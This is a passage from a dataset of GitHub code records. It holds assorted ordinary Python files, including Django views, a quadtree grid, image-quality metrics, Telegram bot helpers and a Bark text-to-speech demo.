.id \"\"\"\n\n key = \"{}.{}\".format(obj.__class__.__name__, obj.id)\n self.__objects[key] = obj\n self.save()\n\n def save(self):\n \"\"\" serializes objects to the JSON file \"\"\"\n dicts = {}\n for key, value in self.__objects.items():\n dicts[key] = value.to_dict()\n with open(self.__file_path, 'w') as f:\n json.dump(dicts, f)\n\n def reload(self):\n \"\"\" deserializes the JSON file to objects \"\"\"\n if exists(self.__file_path):\n with open(self.__file_path, 'r') as f:\n dicts = json.load(f)\n for key, value in dicts.items():\n self.__objects[key] = BaseModel(**value)\n else:\n pass\n","repo_name":"IsmaelMolina-code/holbertonschool-AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15382545108","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Product\nfrom django.http import Http404\nfrom django.db.models import Avg, Min, Max\n\n\n# Create your views here.\n\ndef product_list(request):\n products = Product.objects.all().order_by('-rating')\n number_of_products = products.count()\n average = products.aggregate(Avg('rating'))\n return render(request, 'product_module/product_list.html', {\n 'products': products,\n 'total_number_of_product':number_of_products,\n 'average_ratings': average,\n })\n\n\n\ndef product_detail(request, slug):\n # try:\n # product = Product.objects.get(id=product_id)\n # except:\n # raise Http404()\n product = get_object_or_404(Product, slug=slug)\n return render(request, 'product_module/product_detail.html', {\n 'product': product\n })\n","repo_name":"Khodaprst/GitHub","sub_path":"eshop_project/product_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"13969098057","text":"import random\nim = open('Image/dos.pgm','w')\nim.write('P2\\n')\nim.write('# Hugo Araya Carrasco\\n')\nim.write('512 512\\n')\nim.write('255\\n')\nimagen = ''\nfor i in range(512*512):\n numero = random.randint(0,255)\n imagen = imagen + str(numero)+' '\n\nim.write(imagen+'\\n')\nim.close()","repo_name":"hugo-araya/Seccion1","sub_path":"imagen_pgm/ran.py","file_name":"ran.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18744116964","text":"from typing import List\n\n\nclass Solution:\n def minAvailableDuration(self, slots1: List[List[int]], slots2: List[List[int]], duration: int) -> List[int]:\n idx1 = idx2 = 0\n\n slots1 = sorted(slots1)\n slots2 = sorted(slots2)\n\n while idx1 <= len(slots1) - 1 and idx2 <= len(slots2) - 1:\n s1 = slots1[idx1]\n s2 = slots2[idx2]\n left_intersection = max(s1[0], s2[0])\n right_intersection = min(s1[1], s2[1])\n if right_intersection - left_intersection >= duration:\n return [left_intersection, left_intersection + duration]\n\n # always move the one that ends earlier!\n if s1[1] < s2[1]:\n idx1 += 1\n else:\n idx2 += 1\n\n return []\n","repo_name":"ivankliuk/leetcode","sub_path":"python/meeting-scheduler.py","file_name":"meeting-scheduler.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3088785121","text":"from collections import defaultdict\nfrom typing import *\n\nfrom tqdm import tqdm\n\nfrom backend.trainers.components.mappings.base import _display_creation_kickoff_message\nfrom backend.trainers.components.mappings.token.occurrences import (\n ParaphrasesPOSTagsList,\n ParaphrasesTokens,\n ParaphrasesTokensList\n)\nfrom backend.trainers.components.mappings.token.sentence_indices.base import SentenceIndex2UniqueTokens\nfrom backend.trainers.components.sentence_data import SentenceData\nfrom backend.utils import iterables, strings\n\n\ndef token_maps_foundations(\n sentence_data: SentenceData,\n tokenize_with_pos_tags: Callable[[str], List[Tuple[str, str]]]\n) -> Tuple[SentenceIndex2UniqueTokens, Tuple[ParaphrasesTokensList, ParaphrasesPOSTagsList]]:\n\n # create paraphrases map\n english_sentence_2_paraphrases_with_indices = _english_sentence_paraphrases_with_indices_map(sentence_data=sentence_data)\n\n # define foundations\n sentence_index_2_unique_tokens: SentenceIndex2UniqueTokens = {}\n paraphrases_tokens_list: ParaphrasesTokensList = []\n paraphrases_pos_tags_list: ParaphrasesPOSTagsList = []\n\n # procure proper nouns\n proper_nouns: Set[str] = sentence_data.deduce_proper_nouns()\n\n print('Creating token maps foundations...')\n for paraphrases_with_indices in tqdm(english_sentence_2_paraphrases_with_indices.values()):\n paraphrases, indices = iterables.unzip(paraphrases_with_indices)\n\n # tokenize paraphrases and procure pos tags\n paraphrases_tokens_with_pos_tags: List[List[Tuple[str, str]]] = [tokenize_with_pos_tags(sentence) for sentence in paraphrases]\n if any(map(len, paraphrases_tokens_with_pos_tags)):\n paraphrases_tokens, paraphrases_pos_tags = map(iterables.none_stripped, iterables.unzip_longest(map(lambda paraphrase_tokens_with_pos_tags: iterables.unzip(paraphrase_tokens_with_pos_tags), paraphrases_tokens_with_pos_tags)))\n\n # strip proper nouns, tokens containing digits; convert to lowercase\n paraphrases_tokens = _process_paraphrases_tokens(paraphrases_tokens, proper_nouns=proper_nouns)\n\n # update foundations\n sentence_index_2_unique_tokens.update({index: set(comprising_tokens) for index, comprising_tokens in zip(indices, paraphrases_tokens)})\n paraphrases_tokens_list.append(paraphrases_tokens)\n paraphrases_pos_tags_list.append(paraphrases_pos_tags)\n\n return sentence_index_2_unique_tokens, (paraphrases_tokens_list, paraphrases_pos_tags_list)\n\n\n@_display_creation_kickoff_message('Creating paraphrases map...')\ndef _english_sentence_paraphrases_with_indices_map(sentence_data: SentenceData) -> DefaultDict[str, List[Tuple[str, int]]]:\n english_sentence_2_paraphrases = defaultdict(list)\n\n for i, (english_sentence, foreign_sentence) in enumerate(tqdm(sentence_data)):\n english_sentence_2_paraphrases[english_sentence].append((foreign_sentence, i))\n\n return english_sentence_2_paraphrases\n\n\ndef _process_paraphrases_tokens(paraphrases_tokens: ParaphrasesTokens, proper_nouns: Set[str]) -> ParaphrasesTokens:\n \"\"\" Removes proper nouns, tokens containing digits from paraphrases tokens,\n converts tokens to lowercase \"\"\"\n\n for i, paraphrase_tokens in enumerate(paraphrases_tokens):\n lowercase_paraphrase_tokens = (token.lower() for token in paraphrase_tokens)\n paraphrases_tokens[i] = list(filter(lambda token: token not in proper_nouns and strings.is_digit_free(token), lowercase_paraphrase_tokens))\n\n return 
paraphrases_tokens\n","repo_name":"w2sv/Lingularity-DataMiner","sub_path":"src/token_maps/foundations.py","file_name":"foundations.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11486050607","text":"import warnings\n\nimport numpy as np\nfrom ranges import Range\n\nfrom .state import State\nfrom .extent import RectangleExtent, Point2D\nfrom .utils import int_log2\n\n\ndef empty_quadtree(extent: RectangleExtent, default=State.DEAD):\n from .node import Quadtree\n assert extent.width == extent.height\n level = int_log2(extent.width)\n return Quadtree.empty(level, default)\n\n\nclass Grid(np.ndarray):\n @classmethod\n def from_list(cls, l):\n return np.asarray(l, dtype=object).view(cls)\n\n def __repr__(self):\n return f\"{self.__class__.__name__}(shape={self.shape})\"\n\n def __str__(self):\n if self.ndim != 2:\n warnings.warn(f'Grid should be 2-dimensional, got shape {self.shape}')\n return super().__str__()\n elif self.shape[0] > 0 and self.shape[1] > 0 and not isinstance(self[0, 0], State):\n return super().__str__()\n return '\\n'.join(''.join(str(state) for state in row) for row in self)\n\n @classmethod\n def from_str(cls, s):\n s = s.strip()\n lines = s.splitlines()\n return np.array([[State.from_str(c) for c in line.strip()] for line in lines], dtype=object).view(cls)\n\n @classmethod\n def uninhabitable(cls, width, height):\n # np.full casts our IntEnum to int64 despite dtype=object, so we first\n # create an empty array and then fill it\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.UNINHABITABLE\n return grid.view(cls)\n\n @classmethod\n def dead(cls, width, height):\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.DEAD\n return grid.view(cls)\n\n\nclass LazyGrid:\n def __init__(self, default=State.DEAD):\n assert isinstance(default, State)\n self.default = default\n self._grids = []\n\n def add_grid(self, offset: Point2D, grid: Grid):\n assert isinstance(grid, Grid)\n assert isinstance(offset, Point2D)\n extent = RectangleExtent(Range(offset.x, offset.x + grid.shape[1]), Range(offset.y, offset.y + grid.shape[0]))\n self._grids.append((extent, grid))\n\n def get_quadtree(self, extent: RectangleExtent):\n from .node import QuadtreeBranch, QuadtreeLeaf\n assert extent.width == extent.height\n if extent.width == 1:\n return QuadtreeLeaf(self[Point2D(extent.x_range.start, extent.y_range.start)])\n elif not any(extent.intersects(other_extent) for other_extent, _ in self._grids):\n return empty_quadtree(extent, self.default)\n else:\n assert extent.width % 2 == 0 and extent.height % 2 == 0\n half_width = extent.width // 2\n half_height = extent.height // 2\n ((nw, ne), (sw, se)) = extent.split_x_y()\n return QuadtreeBranch(np.array([\n [self.get_quadtree(nw), self.get_quadtree(ne)],\n [self.get_quadtree(sw), self.get_quadtree(se)]\n ], dtype=object))\n\n def __getitem__(self, point: Point2D):\n values = []\n for extent, grid in self._grids:\n if point in extent:\n values.append(grid[point.y - extent.y_range.start, point.x - extent.x_range.start])\n if values:\n if values[0] == State.UNINHABITABLE:\n assert all(value == State.UNINHABITABLE for value in values)\n return State.UNINHABITABLE\n elif any(value == State.ALIVE for value in values): # OR all values\n return State.ALIVE\n else:\n return State.DEAD\n return self.default\n\n\nclass GridFromQuadtree:\n def __init__(self, quadtree):\n self.quadtree = quadtree\n\n def __getitem__(self, point: Point2D):\n return self.quadtree.get_state(point.x, point.y)\n\n def initial_quadtree_and_extent(self):\n return self.quadtree, RectangleExtent(\n Range(0, self.quadtree.width()),\n Range(0, self.quadtree.width()),\n )\n\n def expand_quadtree_and_extent(self, quadtree, 
extent: RectangleExtent):\n from .node import QuadtreeBranch\n empty = empty_quadtree(extent)\n if (extent.x_range.start + extent.x_range.end) // 2 > 0:\n # Midpoint is positive; expand north-west\n new_extent = RectangleExtent(\n Range(extent.x_range.start - extent.width, extent.x_range.end),\n Range(extent.y_range.start - extent.height, extent.y_range.end),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [empty, empty],\n [empty, quadtree]\n ], dtype=object))\n else:\n # Midpoint is negative; expand south-east\n new_extent = RectangleExtent(\n Range(extent.x_range.start, extent.x_range.end + extent.width),\n Range(extent.y_range.start, extent.y_range.end + extent.height),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [quadtree, empty],\n [empty, empty]\n ], dtype=object))\n return (new_quadtree, new_extent)\n","repo_name":"joliss/hashlife3d","sub_path":"src/hashlife3d/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40164374455","text":"import sys\nimport cv2\nimport argparse\nimport time\nfrom pose.openpose.import_libs import openpose, openpose_model_folder\n\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--image_dir\", default=\"../examples/media/\",\n help=\"Process a directory of images. Read all standard formats (jpg, png, bmp, etc.).\"\n )\n parser.add_argument(\"--no_display\", default=True, help=\"Enable to disable the visual display.\")\n args = parser.parse_known_args()\n\n # Custom Params (refer to include/openpose/flags.hpp for more parameters)\n params = dict()\n params[\"model_folder\"] = openpose_model_folder\n\n # Add others in path?\n for i in range(0, len(args[1])):\n curr_item = args[1][i]\n if i != len(args[1]) - 1:\n next_item = args[1][i + 1]\n else:\n next_item = \"1\"\n if \"--\" in curr_item and \"--\" in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = \"1\"\n elif \"--\" in curr_item and \"--\" not in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = next_item\n\n # Construct it from system arguments\n # op.init_argv(args[1])\n # oppython = op.OpenposePython()\n\n # Starting OpenPose\n opWrapper = openpose.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n # Read frames on directory\n imagePaths = openpose.get_images_on_directory(args[0].image_dir)\n start = time.time()\n\n # Process and display images\n for imagePath in imagePaths:\n datum = openpose.Datum()\n imageToProcess = cv2.imread(imagePath)\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop(openpose.VectorDatum([datum]))\n\n print(\"Body keypoints: \\n\" + str(datum.poseKeypoints))\n\n if not args[0].no_display:\n cv2.imshow(\"OpenPose 1.7.0 - Tutorial Python API\", datum.cvOutputData)\n key = cv2.waitKey(15)\n if key == 27:\n break\n\n end = time.time()\n print(\"OpenPose demo successfully finished. Total time: \" + str(end - start) + \" seconds\")\nexcept Exception as e:\n print(e)\n sys.exit(-1)\n","repo_name":"realzza/Presento","sub_path":"pose/openpose/04_keypoints_from_images.py","file_name":"04_keypoints_from_images.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72626342812","text":"import cv2\nimport numpy as np\nimport torch\n\n# convert 2/3/4-dimensional torch tensor to uint\ndef tensor2uint(img: torch.Tensor):\n img = img.squeeze().float().clamp_(0, 1).cpu().numpy()\n if img.ndim == 3:\n img = np.transpose(img, (1, 2, 0))\n return np.uint8((img*255.0).round())\n \ndef calculate_psnr(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n mse = np.mean((img1 - img2) ** 2)\n if mse == 0:\n return float('inf')\n return 20. * np.log10(255. / np.sqrt(mse))\n\n\ndef _ssim(img1, img2):\n C1 = (0.01 * 255) ** 2\n C2 = (0.03 * 255) ** 2\n\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n kernel = cv2.getGaussianKernel(11, 1.5)\n window = np.outer(kernel, kernel.transpose())\n\n mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5]\n mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]\n mu1_sq = mu1 ** 2\n mu2_sq = mu2 ** 2\n mu1_mu2 = mu1 * mu2\n sigma1_sq = cv2.filter2D(img1 ** 2, -1, window)[5:-5, 5:-5] - mu1_sq\n sigma2_sq = cv2.filter2D(img2 ** 2, -1, window)[5:-5, 5:-5] - mu2_sq\n sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n return ssim_map.mean()\n\n\ndef calculate_ssim(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if img1.dtype is not np.uint8:\n img1 = (img1 * 255.0).round().astype(np.uint8) # float32 to uint8\n if img2.dtype is not np.uint8:\n img2 = (img2 * 255.0).round().astype(np.uint8) # float32 to uint8\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n ssims = []\n for i in range(img1.shape[2]):\n ssims.append(_ssim(img1[..., i], img2[..., i]))\n return np.array(ssims).mean()\n\n\ndef _blocking_effect_factor(im):\n block_size = 8\n\n block_horizontal_positions = torch.arange(7, im.shape[3] - 1, 8)\n block_vertical_positions = torch.arange(7, im.shape[2] - 1, 8)\n\n horizontal_block_difference = (\n (im[:, :, :, block_horizontal_positions] - im[:, :, :, block_horizontal_positions + 1]) ** 2).sum(\n 3).sum(2).sum(1)\n vertical_block_difference = (\n (im[:, :, block_vertical_positions, :] - im[:, :, block_vertical_positions + 1, :]) ** 2).sum(3).sum(\n 2).sum(1)\n\n nonblock_horizontal_positions = np.setdiff1d(torch.arange(0, im.shape[3] - 1), block_horizontal_positions)\n nonblock_vertical_positions = np.setdiff1d(torch.arange(0, im.shape[2] - 1), block_vertical_positions)\n\n horizontal_nonblock_difference = (\n (im[:, :, :, nonblock_horizontal_positions] - im[:, :, :, nonblock_horizontal_positions + 1]) ** 2).sum(\n 3).sum(2).sum(1)\n vertical_nonblock_difference = (\n (im[:, :, nonblock_vertical_positions, :] - im[:, :, nonblock_vertical_positions + 1, :]) ** 2).sum(\n 3).sum(2).sum(1)\n\n n_boundary_horiz = im.shape[2] * (im.shape[3] // block_size - 1)\n n_boundary_vert = im.shape[3] * (im.shape[2] // block_size - 1)\n boundary_difference = (horizontal_block_difference + vertical_block_difference) / (\n n_boundary_horiz + n_boundary_vert)\n\n n_nonboundary_horiz = im.shape[2] * (im.shape[3] - 1) - n_boundary_horiz\n n_nonboundary_vert = im.shape[3] * (im.shape[2] - 1) - n_boundary_vert\n nonboundary_difference = (horizontal_nonblock_difference + vertical_nonblock_difference) / (\n n_nonboundary_horiz + n_nonboundary_vert)\n\n scaler = np.log2(block_size) / np.log2(min([im.shape[2], im.shape[3]]))\n bef = scaler * (boundary_difference - nonboundary_difference)\n\n bef[boundary_difference <= nonboundary_difference] = 0\n return bef\n\n\ndef calculate_psnrb(img1, img2, crop_border, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. 
Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n img1 = torch.from_numpy(img1).permute(2, 0, 1).unsqueeze(0) / 255.\n img2 = torch.from_numpy(img2).permute(2, 0, 1).unsqueeze(0) / 255.\n\n total = 0\n for c in range(img1.shape[1]):\n mse = torch.nn.functional.mse_loss(img1[:, c:c + 1, :, :], img2[:, c:c + 1, :, :], reduction='none')\n bef = _blocking_effect_factor(img1[:, c:c + 1, :, :])\n\n mse = mse.view(mse.shape[0], -1).mean(1)\n total += 10 * torch.log10(1 / (mse + bef))\n\n return float(total) / img1.shape[1]\n\n\ndef reorder_image(img, input_order='HWC'):\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' \"'HWC' and 'CHW'\")\n if len(img.shape) == 2:\n img = img[..., None]\n if input_order == 'CHW':\n img = img.transpose(1, 2, 0)\n return img\n\n\ndef to_y_channel(img):\n img = img.astype(np.float32) / 255.\n if img.ndim == 3 and img.shape[2] == 3:\n img = rgb2ycbcr(img, y_only=True)\n img = img[..., None]\n else:\n raise ValueError(f'Wrong image shape [2]: {img.shape[2]}.')\n return img * 255.\n\n\ndef _convert_input_type_range(img):\n img_type = img.dtype\n img = img.astype(np.float32)\n if img_type == np.float32:\n pass\n elif img_type == np.uint8:\n img /= 255.\n else:\n raise TypeError('The img type should be np.float32 or np.uint8, ' f'but got {img_type}')\n return img\n\n\ndef _convert_output_type_range(img, dst_type):\n if dst_type not in (np.uint8, np.float32):\n raise TypeError('The dst_type should be np.float32 or np.uint8, ' f'but got {dst_type}')\n if dst_type == np.uint8:\n img = img.round()\n else:\n img /= 255.\n return img.astype(dst_type)\n\n\ndef rgb2ycbcr(img, y_only=False):\n img_type = img.dtype\n img = _convert_input_type_range(img)\n if y_only:\n out_img = np.dot(img, [65.481, 128.553, 24.966]) + 16.0\n else:\n out_img = np.matmul(\n img, [[65.481, -37.797, 112.0], [128.553, -74.203, -93.786],[24.966, 112.0, -18.214]]) + [16, 128, 128]\n out_img = _convert_output_type_range(out_img, img_type)\n return out_img\n\ndef calculate_fid_score(predicted_images, true_images, eps=1e-6):\n \"\"\"\n Calculates the Frechet Inception Distance (FID) score between predicted and true images.\n\n Args:\n predicted_images (torch.Tensor): Tensor containing the predicted images.\n true_images (torch.Tensor): Tensor containing the true images.\n eps (float): A small value to avoid division by zero. 
Default: 1e-6.\n\n    Returns:\n        float: The FID score between the predicted and true images.\n    \"\"\"\n\n    # Calculate the mean and covariance of the true images\n    true_images = true_images.detach().cpu().numpy()\n    true_images = np.transpose(true_images, (0, 2, 3, 1))\n    true_images = (true_images * 255).astype(np.uint8)\n    true_images = true_images.reshape(true_images.shape[0], -1)\n    true_mean = np.mean(true_images, axis=0)\n    true_cov = np.cov(true_images, rowvar=False)\n\n    # Calculate the mean and covariance of the predicted images\n    predicted_images = predicted_images.detach().cpu().numpy()\n    predicted_images = np.transpose(predicted_images, (0, 2, 3, 1))\n    predicted_images = (predicted_images * 255).astype(np.uint8)\n    predicted_images = predicted_images.reshape(predicted_images.shape[0], -1)\n    pred_mean = np.mean(predicted_images, axis=0)\n    pred_cov = np.cov(predicted_images, rowvar=False)\n\n    # Calculate the FID score; the Frechet term requires the *matrix* square\n    # root of the covariance product (an elementwise sqrt can produce NaNs on\n    # negative entries), with eps on the diagonal for numerical stability\n    from scipy.linalg import sqrtm  # local import keeps module-level deps unchanged\n    covmean = sqrtm(true_cov.dot(pred_cov) + eps * np.eye(true_cov.shape[0]))\n    if np.iscomplexobj(covmean):\n        covmean = covmean.real\n    fid = np.sum((true_mean - pred_mean)**2) + np.trace(true_cov + pred_cov - 2 * covmean)\n\n    return fid","repo_name":"TheMoon2000/cs280-final-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
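A short usage sketch for the metric helpers above, on synthetic uint8 images (shapes and noise level are illustrative; assumes the module's functions are in scope):

    import numpy as np

    rng = np.random.default_rng(0)
    img = rng.integers(0, 256, size=(64, 64, 3)).astype(np.uint8)
    noisy = np.clip(img.astype(np.float64) + rng.normal(0, 5, img.shape), 0, 255).astype(np.uint8)

    print(calculate_psnr(img, noisy, crop_border=4))            # dB, higher is better
    print(calculate_ssim(img, noisy, crop_border=4))            # close to 1 for similar images
    print(calculate_psnrb(img, noisy, 4, test_y_channel=True))  # crop_border is positional here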
+{"seq_id":"6572969962","text":"import time\r\nimport json\r\n\r\nfrom bot_word_functions import word_clear\r\nfrom bot_leader_functions import clear_leader\r\n\r\n\r\ndef first_run(message): # Create *.json\r\n players = [dict(id=message.from_user.id, first_name=message.from_user.first_name,\r\n username=message.from_user.username, total_score=0, event_score=0, address=None)]\r\n with open(f'{message.chat.title}.json', 'w+') as f:\r\n json.dump(dict(chat_id=message.chat.id, game_id=0, is_event=None, leader_id=None, hidden_word=None,\r\n players=players), f, indent=4, ensure_ascii=False)\r\n\r\n\r\ndef check_admin(message, admins) -> bool:\r\n admins_list = []\r\n for admin in admins:\r\n if not admin.user.is_bot:\r\n admins_list.append(admin.user.id)\r\n for admin_id in admins_list:\r\n if message.from_user.id == admin_id:\r\n return True\r\n\r\n\r\ndef get_game_id(message) -> int:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n chat_data = json.load(f)\r\n chat_data['game_id'] = chat_data['game_id'] + 1\r\n with open(f'{message.chat.title}.json', 'w') as f:\r\n json.dump(chat_data, f, indent=4, ensure_ascii=False)\r\n return chat_data['game_id']\r\n\r\n\r\ndef show_stat(message) -> str:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n players_dict = json.load(f)\r\n new_dict = {}\r\n for player in players_dict['players']:\r\n if not players_dict['is_event']:\r\n new_dict[player['first_name']] = player['total_score']\r\n else:\r\n new_dict[player['first_name']] = player['event_score']\r\n sorted_new_dict_tuples = sorted(new_dict.items(), key=lambda item: item[1], reverse=True)\r\n sorted_dict = {k: v for k, v in sorted_new_dict_tuples}\r\n message_text = []\r\n place = 0\r\n for k in sorted_dict:\r\n place += 1\r\n if not players_dict['is_event']:\r\n message_text.append(f'{place}. Счет: {sorted_dict.get(k)} - {k}')\r\n else:\r\n message_text.append(f'{place}. Earn: {sorted_dict.get(k)} VQRC - {k}')\r\n return '\\n'.join(message_text)\r\n\r\n\r\ndef clear_round_data(message):\r\n clear_leader(message)\r\n word_clear(message)\r\n time.sleep(1)\r\n\r\n","repo_name":"surugh/vqr_p2e_crocodile_bot","sub_path":"bot_functions.py","file_name":"bot_functions.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6736809699","text":"from django import forms\nfrom . import models\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n fields = (\"message\",\"files\",\"post\")\n model = models.Comment\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop(\"user\", None)\n super().__init__(*args, **kwargs)\n if user is not None:\n self.fields[\"post\"].queryset = (\n models.Post.objects.filter(\n pk__in=user.posts.values_list(\"post__pk\")\n )\n )\n","repo_name":"AgrawalNeha25/MyProdctivityToolKit","sub_path":"ToDo App/comments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72609629531","text":"def ruler(num):\r\n i = 1\r\n list1 = \"\"\r\n list2 = \" \"\r\n while(i<=num):\r\n list1 += str(i % 10)\r\n i += 1\r\n if (i % 10 == 0):\r\n list2 += str(int(i / 10))\r\n else:\r\n list2 += \" \"\r\n\r\n print(list2)\r\n print(list1)\r\n\r\nnum = int(raw_input())\r\nruler(num)\r\n","repo_name":"harikad99/Python-Scripting--L1-Assignments","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13556696851","text":"from datetime import datetime\n\nfrom dateutil import rrule\nfrom optimum.bettertransformer import BetterTransformer\nfrom transformers import AutoProcessor, BarkModel\nimport scipy\nimport torch\n# my_now = datetime.now()\n\n# def get_current_device():\n# # print(\"get_current_device...\")\n#\n# DEVICE = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n# DEVICE_ID = \"0\"\n# CUDA_DEVICE = f\"{DEVICE}:{DEVICE_ID}\" if DEVICE_ID else DEVICE\n# # if debug:\n# print(f\"DEVICE:{DEVICE}\")\n# return DEVICE, CUDA_DEVICE\n#\n# DEVICE, CUDA_DEVICE = get_current_device()\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# device = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n\n# 指定本地模型\nmodel_path = \"/Users/jingwu/janewu/llm-model/bark/bark\"\nprocessor = AutoProcessor.from_pretrained(model_path)\nmodel = BarkModel.from_pretrained(model_path, torch_dtype=torch.float).to(device)\n\n# convert to bettertransformer\nmodel = BetterTransformer.transform(model, keep_original_model=False)\n\nsample_rate = model.generation_config.sample_rate\n\n\ndef do_tts(voice_preset, text_prompt, output_wave_fn):\n my_now = datetime.now()\n inputs = processor(text_prompt, voice_preset=voice_preset)\n # print(inputs)\n audio_array = model.generate(**inputs)\n audio_array = audio_array.cpu().numpy().squeeze()\n\n # save them as a .wav file\n scipy.io.wavfile.write(output_wave_fn, rate=sample_rate, data=audio_array)\n print(f\"[total spend]: {rrule.rrule(freq=rrule.SECONDLY, dtstart=my_now, until=datetime.now()).count()} seconds\")\n\n\ndef do_gen_example():\n # v2/en_speaker_6\" v2/en_speaker_0\"\n # \"v2/en_speaker_0\"\n text_prompt = \"Hi! Of course, we can talk about snacks. What would you like to discuss?\"\n # text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n for i in range(10):\n voice_preset = f\"v2/en_speaker_{i}\"\n output_wave_fn = f\"bark_output_{i}.en.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n\nif __name__ == '__main__':\n text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n voice_preset = f\"v2/zh_speaker_0\"\n output_wave_fn = f\"bark_output_0.zh.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n","repo_name":"janewu77/jshare-llm-demo","sub_path":"bark-demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
